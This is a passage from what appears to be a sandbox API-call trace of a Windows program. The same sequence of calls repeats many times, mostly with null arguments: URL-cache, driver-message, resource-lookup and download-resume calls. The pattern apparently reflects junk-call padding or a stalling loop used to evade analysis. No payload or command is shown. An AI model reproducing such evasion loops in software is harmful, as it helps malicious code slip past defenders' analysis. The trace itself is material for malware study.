RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.673] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.673] GetUserDefaultLangID () returned 0x409 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.673] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.673] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.673] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.673] GetUserDefaultLangID () returned 0x409 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.673] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.673] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.673] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.673] GetUserDefaultLangID () returned 0x409 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.673] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.673] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.674] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.674] GetUserDefaultLangID () returned 0x409 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.674] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.674] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.674] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.674] GetUserDefaultLangID () returned 0x409 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.674] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.674] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.674] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.674] GetUserDefaultLangID () returned 0x409 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.674] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.674] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.674] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.674] GetUserDefaultLangID () returned 0x409 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.674] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.674] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.674] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.674] GetUserDefaultLangID () returned 0x409 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.674] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.674] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.674] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.674] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.674] GetUserDefaultLangID () returned 0x409 [0185.674] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.675] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.675] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.675] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.675] GetUserDefaultLangID () returned 0x409 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.675] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.675] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.675] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.675] GetUserDefaultLangID () returned 0x409 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.675] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.675] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.675] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.675] GetUserDefaultLangID () returned 0x409 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.675] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.675] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.675] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.675] GetUserDefaultLangID () returned 0x409 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.675] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.675] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.675] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.675] GetUserDefaultLangID () returned 0x409 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.675] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.675] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.675] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.675] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.675] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.675] GetUserDefaultLangID () returned 0x409 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.676] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.676] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.676] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.676] GetUserDefaultLangID () returned 0x409 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.676] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.676] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.676] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.676] GetUserDefaultLangID () returned 0x409 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.676] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.676] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.676] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.676] GetUserDefaultLangID () returned 0x409 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.676] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.676] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.676] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.676] GetUserDefaultLangID () returned 0x409 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.676] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.676] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.676] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.676] GetUserDefaultLangID () returned 0x409 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.676] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.676] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.676] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.676] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.677] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.677] GetUserDefaultLangID () returned 0x409 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.677] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.677] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.677] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.677] GetUserDefaultLangID () returned 0x409 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.677] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.677] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.677] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.677] GetUserDefaultLangID () returned 0x409 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.677] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.677] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.677] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.677] GetUserDefaultLangID () returned 0x409 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.677] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.677] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.677] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.677] GetUserDefaultLangID () returned 0x409 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.677] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.677] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.677] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.677] GetUserDefaultLangID () returned 0x409 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.677] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.677] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.677] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.677] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.678] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.678] GetUserDefaultLangID () returned 0x409 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.678] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.678] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.678] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.678] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: 